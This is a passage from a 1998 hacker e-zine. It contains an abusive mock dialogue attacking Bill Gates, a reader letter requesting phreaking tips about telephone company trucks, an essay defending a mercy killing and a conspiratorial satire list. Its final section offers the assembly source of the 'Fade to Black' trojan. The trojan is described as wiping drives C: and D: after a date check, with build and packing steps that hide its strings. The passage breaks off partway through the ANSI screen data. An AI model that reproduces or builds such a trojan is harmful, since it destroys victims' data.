fuck are you talking about? Do you think that you can play the odds or go with the odds? Hahaha. - Mr. Gates, I've just received an important memo. Microsoft's stock has just fallen over 10 points in the stock exchange. The rest of the stock market seems oblivious to our crash and is doing quite well. Could it be that Damage, INC. is involved in some way? (conversation heard in the background). - Hahaha! I heard that! ;) Damage, INC. is *definitely* involved. Our plan is working perfectly... and soon Micro$oft stock will be worthless. I love it. - I warned you Gates. Now what do you have to say Billy? Are you going to spew more rhetoric and mince words? Hahaha. - Yeah Gates, how do you like them `apples.' Damage, INC. did a `Job' on you. Hahaha. - Ohnonono! What has happened to my company, built on influence and deceit? My vision has been abandoned by the blind masses! No longer can I dream of having Windows on every computer screen, cell phone, and toaster! Why? Why has it all gone wrong? Why has Damage, INC. destroyed Microsoft? I just wanted to make an honest living. Without my money, I can no longer bully computer distributors to put Microsoft products in all systems. All I am is a college drop out!!! I have no skills other than influencing and being greedy beyond all measure! - Sorry to interrupt you Mr. Geek... errr.. I meant Mr. Gates. We've been flooded with Email messages, concerning the huge drop in Microsoft stock. It's almost worthless now, and many stockholders are sending angry, threatening messages addressed to you. I have been trying to reply to them all in a feeble attempt to calm them down... and brainwash them into believing that Microsoft's stock is still "on top". However, I simply can't keep up! It's insane! They're all panicking and selling as fast as they can... Is this the end of the world? What should I do? I need help. Please help! Mr. Gates, give me instructions. I'll be your lackey until the end. You can trust me not to leave your side... but I don't know what to do. This has *never* happened before! Who or what could cause this? - Hahahaha. Damage, INC. is responsible. ;) - Hahaha. Our plan is working. Micro$oft will be stopped. Micro$oft is in panic mode. Soon it'll be done in. I can't wait for its final destruction... Hehe. - Haha. This is hilarious. Gates has been crushed under the weight of his own greed and ego. His head has been cut off, let's enjoy watching him run around. ;-) - NO! This can't be the end! Lackey, tell all callers that our systems are based on Microsoft Windows and they have all crashed! They'll understand, they all experience it from time to time and keep coming back for more... but why not now? What am I to do? Without my monopoly and wealth I am nothing! What has Damage, INC. done to me? I'll give you all anything... EVERYTHING in order to reverse the destruction of my vision... of the future of the world! - Sir, with all due respect there's nothing that I can do. Your vision won't help fix this situation. Wake up! Quit dreaming Bill! We're in serious trouble... What should I do? The Email is still pouring in... and Microsoft stock is still falling. It looks like the end. I assigned one hundred lackies to respond to Email... and gave them a list of excuses to choose from. That'll only hold them off temporarily though. Some of our previous supporters are rioting and destroying Microsoft HQ. I advise you to go into the fortified concrete bunker... Your own survival depends upon you listening to my advice. Sir, please, take shelter before the angry mob overwhelms us and kills you. - Haha! I've been waiting for this day for a long time. I'm just happy to be a part of Micro$oft's destruction. - I can just picture you Billy... running for shelter... scrambling for your very fucking pathetic life. You sicken me. You didn't heed my words when we last spoke and now you're going to have to pay the price! Hahahaha. - Yeah Billy, go hide in the shadows once more. You can run, but you can't hide you pathetic little geek. - I, er, uhm, (Gates is in panic mode) will get it all back! I will fight and influence my way back `on top.' Then I'll pay for the best men in the world to track Damage, INC. down. You guys are dangerous meanies! You have destroyed the world... a world in which I would be the Big Brother instead of a small, insignificant loser that I truly am. Lackeys! Sell me out of Microsoft! Let everyone fend for themselves, for I have no loyalty to anyone by myself! - Run sir run! Quickly... Quit rambling... and get to the bunker! It's imperative that you listen. Damage, INC. is just trying to make sure you stay on the phone until the masses can infiltrate our security and rip you to shreds. (In a desperate cry) -- Hurry! Let's get out of here. Follow me... - Hahahahaha! (A collective laugh from Damage, INC. is heard from great distances). - That's right Gates. Run Billy run. Haha. Hide in your bunker. We'll find you no matter what. You won't have to try to track us down, because we are gonna hunt you down. :) - Hahaha. Your fucking lackies will eventually abandon you Billy. Once they become as greedy as you are, they will stab you in the back. That is, if Damage, INC. doesn't nuke you first. I will patiently await the day that I can finally say "Stick a fork in Billy, he's done in." ;) Until then... hide in your concrete shelter like the pathetic coward that you are. I hope you cry your eyes out over every penny that you've lost. Start throwing a tantrum and pout in the corner. I'm shaking my head at you Gates. Think about that while you're trying to fend off the rats that Damage, INC. infested your filthy bunker with fucker. Hahaha. . LETTERS TO THE EDITOR - {LETTERS} The message below was written by Fatal Vision on ...AND JUSTICE FOR ALL. I decided to include it and reply in the Damage, INC. Newsletter so that every reader is able to read it. This is your forum for feedback, so send us your letters. Msg # : 153 of 154 Area : Damage, INC. Releases ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ From : Fatal Vision Date : Fri Dec 26 1997 To : All Time : 1:09 pm Title : Damage, INC Newsletter ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The Damage, INC Newsletter issue # 4 has got to be the best one Damage, INC has released yet. It could really help newbie's like me learn more and put there knoledge to practice.. I like and read every article that you guy's realse. It is funny, and fun to read, and that's what it's all about for me, I dont like reading boring INFO, the way you guy's present the articles makes me want to read on, and not leave until I've read the *whole* Newsletter.. Again, I can't say how much your newsletters help the newbies not just in this area code, but *any* area code out there. I would like to see more phreaking articles. mabey experiences, tips,wwhat phreaking is all about, how to make a test phone, or a lineman's handset. What you can do with bell truck's, houses etc. What you can hope to find in a bell truck, what you should *look* for in a bell truck etc. This info could be included in an article. As well, I really enjoyed this month's h/p news and info (Written By Blackie Lawless) and the VIRUS DETECTION method (Written By Blackened) The only section that I have not read yet is the CONSPIRACIES AND COVERUPS section written by Shatazar. But I'll read that some time soon, and get back to you on what I think about it.. I thought I would give you guy's my opinion in a public base instead of leaving Blackened Email. As you can all see I am very impressed with Damage, INC and think they are doing a great job with the newsletter.. I hope all of you relize Damage, INC. puts *alot* of time into EVERY article, writing, editing, and producing it. Its not just something that is slapped together Just to get it done.. Its something that takes alot of thought and time to produce every month. I also hope you relize that the information in the DI's newsletter is very informational, and I hope you take the time to read and leave feedback like i just did. To Damage, INC - Keep up the excellent work.. your's truely fatal vision ------------------------------------------------------------------------------- Editor - Blackie Lawless and I appreciate the feedback man. Why didn't you read the CONSPIRACIES AND COVERUPS section and comment on it? It contains some valuable information that could easily affect you. That article should be of interest to anyone that's involved in h/p. We're glad that the information we provide is useful to newbies. As for articles on phreaking, we plan to do that. ;) Blackie Lawless will probably continue to share his knowledge, tips, experiences etc. in that area with readers. We do put a lot of time, thought and effort into every article. Thanks for the compliments and feedback... and continue to read the Damage, INC. Newsletter man. We hope that you enjoy this January issue. OBJECTIVE OPINIONS - {OPINIONS} Robert Latimer; victim of cowardly inaction. Robert Latimer was a Saskatchewan farmer that had a 12 year old daughter Tracy, who suffered from cerebral palsy. In 1993, he placed Tracy in a truck, which he rigged so that the cab would fill with carbon monoxide. He freed Tracy from a life of pain and total reliance on others. I do not believe that Robert Latimer killed Tracy just because she had cerebral palsy. Tracy Latimer endured a life of suffering and torture. She endured many operations in vain attempts to alleviate the endless pain. And as she approached puberty, her already twisted body would have encountered rapid growth. Her agony would have increased dramatically. Robert Latimer could no longer stand by as his daughter struggled through each day. I would have done the same thing if I was standing in his shoes. Latimer was arrested in November 1993 and was charged with first degree murder (In Canada, maximum punishment is life with no chance of parole for 25 years). He was convicted on November 16, 1994. The Saskatchewan Court of Appeal upheld the conviction on July 18, 1995. The case went to the Supreme Court of Canada. On February 6, 1997, the judges overturned the conviction, because the crown lawyers questioned potential jurors about their views on religion, abortion and mercy killing. In other words, crown prosecutors tampered with the jury. The court ordered a retrial. During the second trial, the jury found Latimer guilty of second degree murder. However, when the jury found out the minimum sentence (10 years) they could issue, some were appalled. They felt that such a sentence was to harsh, and recommended a minimum sentence of one year. Justice Ted Noble agreed with the jury. In early December 1997, Robert Latimer was sentenced to one year in jail plus one year house arrest on his Saskatchewan farm. In handing out this sentence, Noble used the Charter of Rights of Freedom to Latimer's benefit. He ruled that to sentence him to a minimum of 10 years for a "homicide that was committed for caring and altruistic reasons" would be cruel and unreasonable punishment. However, he also said that a jail term is needed to deter others from committing a similar crime. In other words, Latimer is being made an example out of, just like a vicious criminal. Since Noble's decision is unprecedented, an appeal by the crown would not be surprising. And so the neverending process called the "justice" system will keep on going. Because of this controversial decision, the media has initiated extensive discussions and debates. As always, citizens have picked up on that, so now the recent sentencing of Robert Latimer is currently a hot topic. Special interest groups are coming out of the woodwork. There are those that claim to support the disabled, others that believe in mercy killing. There are Javert (cop in Les Miserables) clones that feel that the stated punishment in the law is paramount, and that circumstances are irrelevant. While others (albeit not many) actually believe in fairness and justice. I've had a few good laughs (and stomach churnings) watching zombies squirm when TV beat reporters walked up to them and asked for their opinion on the Latimer case. However, I've learned that an enlightened person will step away from the narrow scope of the public debate over this issue and look at the big picture. I ask you who wasn't mentioned above? Who is too cowardly to deal with the issue of mercy killing? The answer is the group of corrupt, self-serving people that are responsible for the confusion. The Government of Canada. The leaders of "society" bears a huge amount of responsibility for this whole ordeal. They label important issues like mercy killing as "political suicide." They are too cowardly to do anything about it. It is because of their inaction that Robert Latimer was branded a "murderer" when he ended his daughter's terrible suffering. It is because of their inaction that Robert Latimer has lost his livelihood, his savings, and most importantly his freedom. The consequences of the government's inaction are broad. If the bastards in Ottawa are too scared to deal with the issue, why don't they allow the decision to be made by the suffering person and his or her family? That would be a logical step, but remember we don't live in a democracy. It is repulsive to know that the government has so much control that a suicide attempt is considered to be a criminal act. :( Instead, the government has left it up to the "justice" system to decide Canada's policy on mercy killing. Obviously, all that judges can base their decisions on are laws like the Criminal Code. Therefore, mercy killers are considered murderers by default. Is that fair or just? "Society" doesn't like it too much when "people take the law into their own hands." On the other hand, the government doesn't have *any* statement or opinion on the matter. Because of the gross misconduct of the government, women are allowed to kill their unborn babies, yet choosing to assist a loved one end his or her life can put you in prison from 10 years to life. Unfortunately, mercy killing and the Robert Latimer case is only one example of how spineless and hypocritical the government is. They are not an innocent party just because they refused to act. In my opinion, if Robert Latimer is a murderer, then the government is a liable accomplice. They can't have it both ways. Written by Shatazar ú Damage, INC. (C)opyright 1998. REPORTS FROM THE FRONT - {REPORTS} TEN TIPS ON HOW TO LIVE IN THE NEW WORLD ORDER By No. 405-33-1231 1. WATCH LOTS OF TELEVISION. Television pleasantly sublimates the primitive human defense mechanism that can get you in trouble. 2 AVOID TALKING ABOUT RELIGION OR POLITICS. No matter how innocuous your speech may be, it could be misinterpreted and recorded in your Government Personal Thought Dossier. 3. IDENTIFY YOURSELF BY SOCIAL SECURITY NUMBER. Use of one's Christian or Family name may be perceived as prideful individualism.......a Class B Felony. 4. PUBLICLY DISOWN FAMILY MEMBERS AND FRIENDS WHO HAVE BEEN COERCIVELY ENROLLED IN RE-EDUCATION CENTERS. NWO Rules of Justice provide for expeditious prosecution and conviction of Guilt by Association. 5. VOTE CORRECTLY. The new FAX, PHONE, and MAIL BALLOTING SYSTEM is carefully monitored by Elections Security Police (ESP) to identify potential dissidents and enemies of the World. Avoid voting for mavericks ----most of whom are sponsored and financed by the World Government Opportunities Agency (WGOA) to bring malcontents out into the open. To assure minimal risk when voting, cast your ballot for incumbents having an A-1 rating by the ADL. 6. ATTEND ALL POLITICALLY-CORRECT RALLIES AND PATRIOTIC FUNCTIONS IN YOUR AREA. To obtain additional merit points, carry a sign which derides viewpoints held by Constitutionalists, Patriot Groups, Fundamentalist Christians and other bigots. 7. MEMORIZE THE OPINIONS OF THE NWO LEADERS AND TELEVISION ANCHOR PERSONS. Reiterate them as if they were your own during all social and business conversations. 8. ATHEISM IS THE SAFEST POLICY. But affiliations with State-Approved religious organizations are permitted, and may be rich fields for business contacts. 9. BE AMONG THE FIRST IN YOUR NEIGHBORHOOD TO TURN IN YOUR SPORTING RIFLES when the UNIVERSAL PLOWSHARES ACT goes into effect. You will be well-fed under the terms of THE SOCIAL PAN-AGRICULTURE AND WILDLIFE PROTECTION PROGRAM, hunting will be unnecessary, and possession of firearms of any description after the effective date of UPA will constitute the capitol offense of Aggravated Intent to Commit Homicide. 10.WILLINGLY AND HAPPILY SURRENDER YOUR PARENTAL RIGHTS, participate enthusiastically in the new OBE school program and realize the honor associated with being a breeder and care taker of the first generation to SERVE THE MASTERS in THE NEW WORLD ORDER. - If you find any interesting articles, or you've written one, send it in. If it's quality, we'll publish it. ;) SOURCE AND SCRIPTS - {SOURCE} The Fade to Black Trojan is featured this month in the spotlight. The assembly source code is fully commented and should be fairly easy to understand. You can modify the text strings, ansi screen etc. In fact, you must change them if you want to use the trojan. This is basically how the trojan works. After FTB.EXE is executed, it checks the date. Then it compares the day to 12. If it's below the 12th of the month (1-11), it displays the ansi screen, final message and exits to DOS. If it's the 12th of the month or higher, it will activate. Upon activation, Fade to Black nukes Drive C: and D: if it exists. Next, the tweeter beeps 5 times. You can change the number of drives and beeps if you want. Lastly, the ansi screen is displayed. ANSI.SYS is not required for ansi support. So, no matter what day it is executed on the ansi screen and final message are displayed. The difference is if you run FTB.EXE on the 12th of any month or later, it'll activate and do damage. I'm including the source code so that you can read it and learn. It isn't intended to be used to nuke people. I wrote it to teach people some assembly techniques (loops, displaying an ansi screen, jumps, compares, using counters etc.) If people abuse it, then I won't include any trojans in the Damage, INC. Newsletter again. You can test this trojan safely by changing your system date, so that the day is less than but not equal to 12. In other words, the day of the month must be 1-11 so that it won't activate and nuke you. This trojan has been tested extensively on several systems and only activates when the day is 12 or greater. Disclaimer: If you assemble and nuke yourself with this trojan, it is your own fault. You've been warned about what it does and the source code is commented. You are responsible, not Damage, INC. ------------------------------------------------------------------------------- ;[Fade to Black Trojan] (C) 1998 by BLACKENED ú Damage, INC. ;Use Pklite -e FTB.EXE to make the trojan smaller and hide the text strings. ;TASM /M FILENAME.ASM then TLINK FILENAME.OBJ. DAM_LENGTH EQU 4000 ;Size of the ANSI .MODEL small ;We are a very small trojan .STACK 100h ;256 byte stack .DATA ;Below is the final message that is displayed. Message DB 'Courtesy of Damage, INC.',13,10,'$' ;Below is the message that's written to the hard drives. Damage DB 'The damage has been done. Fade to Black.',13,10 DB 'You nuked yourself. This hard drive is done in.',13,10 DB 'Now you can smile and fucking grin.',13,10 ;Data storage area that holds the ansi screen that was saved in ;TheDraw's asm format. The ansi included is just an example. You ;must modify or replace it before using this trojan. DAM_DATA LABEL BYTE DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB 'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,'Û',1,'Û',1,' ',8,'Û',1,'Û',1,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB 'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB 'Û',1,'Û',1,' ',8,'Û',1,'Û',1,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,'ß',1 DB 'Û',1,'Û',1,'Û',1,'ß',1,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1 DB 'Ü',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Ü',1 DB 'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Ü',1,'Ü',1,'Ü',1 DB 'Ü',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1 DB 'Ü',1,'Ü',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1,'Ü',1 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Ü',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Ü',1,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1 DB 'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Û',1 DB 'Û',1,'Û',1,'Û',1,'Û',1,'Û',1,'Ü',1,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'ß',1,'ß',1,'ß',1 DB 'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'Û',1,'Û',1,'Û',1,'Û',1 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1 DB 'Û',1,' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1 DB 'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,'ß',1,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'ß',1,'ß',1,'ß',1 DB 'ß',1,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB 'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8 DB ' ',8,' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8 DB ' ',8,'Û',1,'Û',1,'Û',1,'Û',1,' ',8,' ',8,' ',8,' ',8 DB ' ',8,' ',8,'Û',1,'Û',1,'Û',1,'Û',1,'Ü',1,'Ü',1,'Ü',1 DB 'Ü',1,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,' ',8,'Û',1 DB 